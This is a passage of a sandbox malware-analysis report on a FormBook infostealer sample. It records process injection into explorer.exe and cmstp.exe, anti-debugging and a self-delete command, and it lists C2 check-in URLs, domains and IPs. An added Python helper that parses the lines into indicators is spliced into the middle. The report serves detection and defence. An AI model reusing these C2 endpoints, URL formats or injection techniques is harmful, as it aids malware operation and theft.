          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_0462927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_04674257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe Code function: 4_2_046AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.jcernadas.com
          Source: C:\Windows\explorer.exe Domain query: www.theholisticbirthco.com
          Source: C:\Windows\explorer.exe Domain query: www.productsoffholland.com
          Source: C:\Windows\explorer.exe Network Connect: 45.88.202.115 80
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Domain query: www.tor-one.com
          Source: C:\Windows\explorer.exe Domain query: www.glgshopbd.com
          Source: C:\Windows\explorer.exe Network Connect: 192.185.48.194 80
          Source: C:\Windows\explorer.exe Network Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exe Domain query: www.autotrafficbot.com
          Source: C:\Windows\explorer.exe Network Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exe Network Connect: 188.93.150.75 80
          Source: C:\Windows\explorer.exe Network Connect: 52.15.160.167 80
          Source: C:\Windows\explorer.exe Network Connect: 52.216.152.43 80
          Source: C:\Windows\explorer.exe Network Connect: 45.82.188.40 80
          Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exe Domain query: www.de-knutselkeet.com
          Source: C:\Windows\explorer.exe Domain query: www.markmalls.com
          Source: C:\Windows\explorer.exe Network Connect: 80.67.16.8 80
          Source: C:\Windows\explorer.exe Network Connect: 35.240.239.44 80
          Source: C:\Windows\explorer.exe Domain query: www.jamessicilia.com
          Source: C:\Windows\explorer.exe Domain query: www.kinfet.com
          Source: C:\Windows\explorer.exe Domain query: www.physicalrobot.com
          Source: C:\Windows\explorer.exe Domain query: www.zhuledao.com
          Source: C:\Windows\explorer.exe Domain query: www.cgpizza.net
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.curiosityisthecurebook.com
          Source: C:\Windows\explorer.exe Domain query: www.usinggroovefunnels.com
          Contains functionality to prevent local Windows debugging
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Code function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Section loaded: unknown target: C:\Users\user\Desktop\TazxfJHRhq.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 1190000
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe Process created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: explorer.exe, 00000003.00000000.219509749.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
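The lines above record the injection chain (TazxfJHRhq.exe writing executable sections into explorer.exe and cmstp.exe, cmstp.exe writing back into explorer.exe and spawning cmd.exe to delete the dropper) and the network activity that explorer.exe, a system process, then generates. The Python below is an added triage example, not part of the sandbox report or of the vendor's tooling: it parses a handful of signature lines copied from this report into network IOCs and a process-to-process injection graph, and applies a heuristic for the check-in URL shape visible in the Contacted URLs section (one short path segment, one long base64-looking parameter, one short token). The regexes, function names and that heuristic are my own assumptions; the "/evpn/" path name is specific to this sample, so the heuristic deliberately matches on shape rather than on the name.

```python
"""Triage helper for Joe Sandbox-style signature lines in a FormBook report.

Added example: this is not code from the sandbox report or from the vendor.
The regexes, function names and the check-in heuristic are assumptions of
mine, derived only from lines visible in the report.
"""
import ntpath
import re
from urllib.parse import urlsplit

# Constructed input: lines copied from the report. The regex below tolerates
# the extraction artifact that glues "...exe" to the following word.
SAMPLE_LINES = """\
Source: C:\\Windows\\explorer.exeDomain query: www.jcernadas.com
Source: C:\\Windows\\explorer.exe Network Connect: 45.88.202.115 80
Source: C:\\Windows\\explorer.exeNetwork Connect: 23.227.38.74 80
Source: C:\\Users\\user\\Desktop\\TazxfJHRhq.exe Section loaded: unknown target: C:\\Windows\\explorer.exe protection: execute and read and write
Source: C:\\Users\\user\\Desktop\\TazxfJHRhq.exe Section loaded: unknown target: C:\\Windows\\SysWOW64\\cmstp.exe protection: execute and read and write
Source: C:\\Windows\\SysWOW64\\cmstp.exe Section loaded: unknown target: C:\\Windows\\explorer.exe protection: execute and read and write
Source: C:\\Users\\user\\Desktop\\TazxfJHRhq.exe Thread APC queued: target process: C:\\Windows\\explorer.exe
Source: C:\\Windows\\SysWOW64\\cmstp.exe Process created: C:\\Windows\\SysWOW64\\cmd.exe /c del 'C:\\Users\\user\\Desktop\\TazxfJHRhq.exe'
"""

KINDS = ("Domain query", "Network Connect", "Section loaded",
         "Thread APC queued", "Process created")
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe)\s*(?P<kind>" + "|".join(KINDS) + r"): (?P<rest>.*)$")

# Windows binaries that have no business originating C2 traffic on their own.
SYSTEM_PROCESSES = {"explorer.exe", "cmstp.exe", "svchost.exe"}


def parse_lines(text):
    """Return (source_basename, kind, rest) for every recognised line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((ntpath.basename(m["src"]), m["kind"], m["rest"]))
    return events


def network_iocs(events):
    """Domains, (ip, port) endpoints, and which system processes produced them."""
    domains, endpoints, suspicious = set(), set(), set()
    for src, kind, rest in events:
        if kind == "Domain query":
            domains.add(rest.strip())
        elif kind == "Network Connect":
            ip, port = rest.split()
            endpoints.add((ip, int(port)))
        else:
            continue
        if src.lower() in SYSTEM_PROCESSES:
            suspicious.add(src)
    return {"domains": domains, "endpoints": endpoints, "system_procs": suspicious}


def _target(kind, rest):
    """Pull the target binary out of the free-text remainder of an event."""
    if kind == "Section loaded":
        return re.search(r"target: (.+?) protection:", rest).group(1)
    if kind == "Thread APC queued":
        return rest.split("target process: ", 1)[1]
    if kind == "Process created":
        return rest.split()[0]
    return None


def injection_chain(events):
    """Sorted unique (source, target) edges: who wrote into or spawned whom."""
    edges = set()
    for src, kind, rest in events:
        tgt = _target(kind, rest)
        if tgt:
            edges.add((src, ntpath.basename(tgt)))
    return sorted(edges)


# Shape of the check-in URLs in this report: a single short path segment, one
# long base64-looking value and one short token. The path name is sample-
# specific, so this is a triage hint, not a signature.
PATH_RE = re.compile(r"^/[A-Za-z0-9]+/$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{4,16}$")


def looks_like_checkin(url):
    parts = urlsplit(url)
    if not PATH_RE.match(parts.path) or not parts.query:
        return False
    # Split by hand: parse_qs would turn '+' into a space and break the base64 test.
    values = [kv.split("=", 1)[1] for kv in parts.query.split("&") if "=" in kv]
    if len(values) != 2:
        return False
    return bool(B64_RE.match(values[0]) and TOKEN_RE.match(values[1]))


if __name__ == "__main__":
    ev = parse_lines(SAMPLE_LINES)
    print(network_iocs(ev))
    print(injection_chain(ev))
```

The `system_procs` entry is the detection hook: a Domain query or Network Connect whose source is explorer.exe is exactly the "system process connects to network" condition the report flags, and the edge list reproduces the dropper -> explorer.exe / cmstp.exe -> explorer.exe chain without reading the whole report by hand.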

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          One column per tactic; a digit string after a technique name is the report's count badge, reproduced as it appears. Empty cells are left blank.

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 3 | OS Credential Dumping | Security Software Discovery 141 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | Carrier Billing Fraud | 
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 11 | LSA Secrets | File and Directory Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | 
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | 

          Behavior Graph

          Behavior Graph ID: 383852, Sample: TazxfJHRhq.exe, Start date: 08/04/2021, Architecture: WINDOWS, Score: 100. The graph image itself is not reproduced; the process tree and the per-node annotations recoverable from it follow.

          Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures.

          Process tree:
          TazxfJHRhq.exe (started) - drops C:\Users\user\AppData\...\i9y7dp4bi0ysdq.dll (PE32). Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging.
            TazxfJHRhq.exe (started, second instance). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection).
              explorer.exe (injected). Contacts usinggroovefunnels.com 192.185.48.194:80 (source port 49745; UNIFIEDLAYER-AS-1US, United States), www.de-knutselkeet.com 188.93.150.75:80 (source port 49740; SIGNET-AS Signet BV, Netherlands) and 20 other IPs or domains. Signature: System process connects to network (likely due to code injection or exploit).
                cmstp.exe (started). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements.
                  cmd.exe (started)
                    conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          TazxfJHRhq.exe | 15% | Virustotal | 
          TazxfJHRhq.exe | 25% | ReversingLabs | Win32.Trojan.Wacatac

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.TazxfJHRhq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.cmstp.exe.4af7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.1.TazxfJHRhq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.TazxfJHRhq.exe.73790000.5.unpack | 100% | Avira | HEUR/AGEN.1131513
          0.2.TazxfJHRhq.exe.27a0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.cmstp.exe.6bd538.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          Source | Detection | Scanner | Label
          www.jcernadas.com | 0% | Virustotal | 
          www.de-knutselkeet.com | 0% | Virustotal | 

          URLs

          Source | Detection | Scanner | Label
          http://www.autotrafficbot.com/evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.kinfet.com/evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.physicalrobot.com/evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.zhuledao.com/evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu | 100% | Avira URL Cloud | malware
          http://www.tiro.com | 0% | URL Reputation | safe
          www.autotrafficbot.com/evpn/ | 0% | Avira URL Cloud | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu | 100% | Avira URL Cloud | malware
          http://www.curiosityisthecurebook.com/evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.de-knutselkeet.com/evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.productsoffholland.com/evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN | 0% | Avira URL Cloud | safe
          http://www.markmalls.com/evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu | 100% | Avira URL Cloud | malware
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.cgpizza.net/evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.physicalrobot.com/ | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.tor-one.com/evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu | 0% | Avira URL Cloud | safe
          http://www.physicalrobot.com | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.jcernadas.com | 52.216.152.43 | true | true | - | unknown
          www.de-knutselkeet.com | 188.93.150.75 | true | true | - | unknown
          www.markmalls.com | 35.240.239.44 | true | false | - | unknown
          curiosityisthecurebook.com | 34.102.136.180 | true | false | - | unknown
          usinggroovefunnels.com | 192.185.48.194 | true | true | - | unknown
          www.jamessicilia.com | 208.91.197.91 | true | true | - | unknown
          shops.myshopify.com | 23.227.38.74 | true | true | - | unknown
          www.tor-one.com | 80.67.16.8 | true | true | - | unknown
          cgpizza.net | 34.102.136.180 | true | false | - | unknown
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 52.15.160.167 | true | false | - | high
          www.physicalrobot.com | 52.58.78.16 | true | true | - | unknown
          www.autotrafficbot.com | 45.88.202.115 | true | true | - | unknown
          productsoffholland.com | 45.82.188.40 | true | true | - | unknown
          ext-sq.squarespace.com | 198.185.159.144 | true | false | - | high
          www.theholisticbirthco.com | unknown | unknown | true | - | unknown
          www.productsoffholland.com | unknown | unknown | true | - | unknown
          www.kinfet.com | unknown | unknown | true | - | unknown
          www.glgshopbd.com | unknown | unknown | true | - | unknown
          www.zhuledao.com | unknown | unknown | true | - | unknown
          www.cgpizza.net | unknown | unknown | true | - | unknown
          www.curiosityisthecurebook.com | unknown | unknown | true | - | unknown
          www.usinggroovefunnels.com | unknown | unknown | true | - | unknown

                                                  Contacted URLs


                                                  URLs from Memory and Binaries


                                                                      Contacted IPs


                                                                      Public


                                                                      General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383852
Start date: 08.04.2021
Start time: 11:08:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: TazxfJHRhq.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/3@15/13
EGA Information: Failed
HDC Information:
• Successful, ratio: 24% (good quality ratio 22.1%)
• Quality average: 76%
• Quality standard deviation: 30.2%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • TCP Packets have been reduced to 100
                                                                      • Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.54.113.53, 13.88.21.125, 104.43.193.48, 52.147.198.201, 95.100.54.203, 20.50.102.62, 23.10.249.26, 23.10.249.43, 20.54.26.129
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs


                                                                      Domains

                                                                      Match | Associated Sample Name / URL | Detection | Context
                                                                      www.jcernadas.com | Shipping Documents.xlsx | malicious | 52.217.8.51
                                                                      www.jcernadas.com | Invoice No. 21SWZ020.exe | malicious | 52.217.37.211
                                                                      www.jcernadas.com | igPVY6UByI.exe | malicious | 52.217.65.131
                                                                      shops.myshopify.com | AQJEKNHnWK.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | New Order.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | payment.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | BL836477488575.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | Order.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | PO.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | PO91361.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | RFQ11_ZIM2021pdf.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | 1517679127365.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | W88AZXFGH.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | PaymentInvoice.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | PI 04-02-21.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | OC CVE9362 _TVOP-MIO 2(C) 2021,pdf.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | P1 032021.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | PDF NEW P.OJerhWEMSj4RnE4Z.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | bank details.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | PURCHASE ORDER _675765000.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | YMvYmQQyCz4gkqA.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | yQh96Jd6TZ.exe | malicious | 23.227.38.74
                                                                      shops.myshopify.com | Swift.exe | malicious | 23.227.38.74

                                                                      ASN

                                                                      Match | Associated Sample Name / URL | Detection | Context
                                                                      AMAZON-02US | 1wOdXavtlE.exe | malicious | 52.216.179.59
                                                                      AMAZON-02US | hvEop8Y70Y.exe | malicious | 15.165.26.252
                                                                      AMAZON-02US | 8sxgohtHjM.exe | malicious | 3.13.255.157
                                                                      AMAZON-02US | eQLPRPErea.exe | malicious | 13.248.216.40
                                                                      AMAZON-02US | vbc.exe | malicious | 3.13.255.157
                                                                      AMAZON-02US | o2KKHvtb3c.exe | malicious | 18.218.104.192
                                                                      AMAZON-02US | Order Inquiry.exe | malicious | 3.14.206.30
                                                                      AMAZON-02US | 6IGbftBsBg.exe | malicious | 104.192.141.1
                                                                      AMAZON-02US | nicoleta.fagaras-DHL_TRACKING_1394942.html | malicious | 52.218.213.96
                                                                      AMAZON-02US | PaymentAdvice.exe | malicious | 3.14.206.30
                                                                      AMAZON-02US | ikoAImKWvI.exe | malicious | 104.192.141.1
                                                                      AMAZON-02US | BL01345678053567.exe | malicious | 3.14.206.30
                                                                      AMAZON-02US | AL JUNEIDI LIST.xlsx | malicious | 65.0.168.152
                                                                      AMAZON-02US | DYANAMIC Inquiry.xlsx | malicious | 65.0.168.152
